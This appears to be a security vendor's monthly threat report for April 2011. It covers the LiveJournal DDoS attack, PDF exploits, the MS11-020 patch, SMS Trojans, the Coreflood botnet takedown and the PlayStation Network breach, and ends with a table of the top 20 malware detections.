DDoS attack on LiveJournal

The DDoS attack that targeted LiveJournal.com at the end of March continued into early April and was big news in Russia. The fact that we had been monitoring one of the botnets responsible for the attack meant we discovered quite a few details about the incident.

Initially, every computer in the botnet received commands to attack one or two links per day. On 4 April, however, the bots received a list of 36 links that included http://livejournal.com and http://livejournal.ru. The other links in the list led to popular pages in the Russian-language blogosphere. The pages in question were unavailable at various times on 30 March, 4 and 6 April. The attacks stopped after 6 April.

The botnet we monitored was based on the popular Optima bot which appeared for sale at the end of 2010. Several indicators suggest that the zombie network behind the DDoS attacks brought together tens of thousands of machines infected with Optima. Apart from DDoS attacks, the bot’s functionality includes downloading other executable files to infected computers and stealing passwords for a number of popular programs.

PDF exploits

Once again we have recorded a rise in the use of exploits that target vulnerabilities in Adobe products. One of these exploits – Exploit.JS.Pdfka.dmg – appeared in ninth position in the Top 20 malicious programs detected on the Internet. The number of users subjected to attacks by variations of Exploit.JS.Pdfka ran into the hundreds of thousands in April. The diagram below illustrates where the attacks were most prominent.

In April the Exploit.JS.Pdfka family was most prominent in Russia (1st place), the USA (2nd) and Germany (3rd)

For the umpteenth time cybercriminals have used the tactic of placing a malicious script on a legitimate site that has been compromised. If someone using vulnerable software visits the compromised website, the script exploits the vulnerability almost instantly, downloading one or more malicious programs to the victim’s computer. In other words, this is a classic drive-by download attack.

In April, Adobe closed the latest series of vulnerabilities in its Adobe Reader and Adobe Acrobat products. The vulnerabilities were rated as ‘Critical’. We strongly recommend that all users update these applications if they have them installed on their computers. You can find patches for various versions of the products here: www.adobe.com/support/security/bulletins/apsb11-08.html.

Vulnerability MS11-020

April also saw Microsoft release 17 bulletins closing vulnerabilities in various Windows products. Among the 63 vulnerabilities addressed by Microsoft there is a patch for the critical MS11-020 loophole. The vulnerability was discovered in SMB Server. It allowed remote code execution if an attacker created a specially crafted SMB packet and sent the packet to a susceptible system. The vulnerability poses a serious risk – the discovery of similar vulnerabilities in the past has led to the appearance of worms such as Kido. Therefore, we strongly recommend that all users update their systems as quickly as possible.

SMS Trojans

SMS Trojans continued to spread rapidly in April, primarily in Russia. One of the ways SMS Trojans spread is via SMS spam and we received regular reports of this happening throughout the month.

There were similarities between several of the SMS spam mailings:

the messages were sent at approximately the same time (around 1 AM GMT)

the vast majority of the messages read as follows: “There’s an MMS for the subscriber <recipient’s telephone number>. See: http://******.do.am/имя_файла.jar”

the malicious links used the file names YaZ.jar or 606.jar

Example of an SMS spam message

At the time the first SMS spam messages appeared, the files that the links led to were already detected by Kaspersky Lab as Trojan-SMS.J2ME.Smmer.f.

Another interesting detail is that the malicious sites that the links lead to appear to have been created using a free online website builder. The owner of the builder also offers hosting services which the criminals have used to host their malicious sites at the .do.am second level domain.

Coreflood botnet shut down

The anti-botnet campaign continues. Following the closure of the Rustock botnet, which we wrote about in last month’s report, the command centers of the huge Coreflood botnet were closed down. The majority of the 2 million zombie machines were located in the USA.

The closure was initiated by the US Department of Justice which received permission to seize control of the botnet. Commands were then sent to all the bots in the network to cease functioning.

This is not the first time that the authorities have intervened to neutralize a botnet. Rustock, for example, was shut down in a joint operation by Microsoft and US law enforcement agencies, while the Bredolab botnet was closed, and the alleged owners arrested, by Dutch police.

Let’s hope that this is not the last time we see state authorities intervening to help shut down botnets.

PlayStation Network hacked

At the end of April, Sony reported that their PlayStation Network (PSN) had been compromised. The corporation confirmed that all kinds of user data, including names, email and postal addresses, dates of birth, logins and passwords, had become available to an unknown attacker. Sony could not rule out that credit card data had not been taken, though there was no evidence to suggest it had.

Sony announced it was investigating the incident in cooperation with an unnamed company.

There are around 75 million accounts registered with PSN, making the incident the biggest ever personal data leak. At the time of writing there was still no information about when PSN would be back up and running.

If you are a PSN member we highly recommend keeping an eye on your credit card info for signs of fraud. We further recommend that any passwords used on the PSN network that may have been reused elsewhere get changed immediately. Additionally be alert for any email purporting to be from Sony or its affiliates requesting any personal information.

P.S. On 2 May, Sony issued a statement saying that as a result of the hacker attack the criminals had gained access to the personal data (names, addresses, emails, gender, birth dates, telephone numbers, logins and hashed passwords) not only of PSN gamers but also users of Sony Online Entertainment. The company also said that the hackers accessed an outdated database from 2007 which contained 12,700 credit and debit card numbers and expiration dates.

TOP 20 malicious programs on the Internet

Current rank

Change in position

Verdict

Number of attacks*

1

2

AdWare.Win32.HotBar.dh

855838

2

4

Trojan.JS.Popupper.aw

622035

3

New

AdWare.Win32.Zwangi.fip

356671

4

New

AdWare.Win32.Agent.uxx

300287

5

New

AdWare.Win32.Gaba.eng

254277

6

New

AdWare.Win32.FunWeb.jp

200347

7

New

AdWare.Win32.FunWeb.kd

170909

8

New

AdWare.Win32.Zwangi.fmz

161067

9

New

Exploit.JS.Pdfka.dmg

140543

10

New

Trojan.JS.Redirector.oy

138316

11

New

Trojan-Ransom.Win32.Digitala.bpk

133301

12

0

Trojan.JS.Agent.uo

109770

13

0

Trojan-Downloader.JS.Iframe.cdh

104438

14

New

AdWare.Win32.Gaba.enc

96553

15

-11

Trojan.HTML.Iframe.dl

95299

16

-14

Hoax.Win32.ArchSMS.pxm

94255

17

New

Trojan-Downloader.Win32.Zlob.aces

88092

18

New

Trojan-Ransom.JS.SMSer.hi

83885

19

New

Trojan.JS.Iframe.ku

77796

20

New

AdWare.Win32.FunWeb.jt

65895

* Total number of unique incidents detected by web antivirus on users’ computers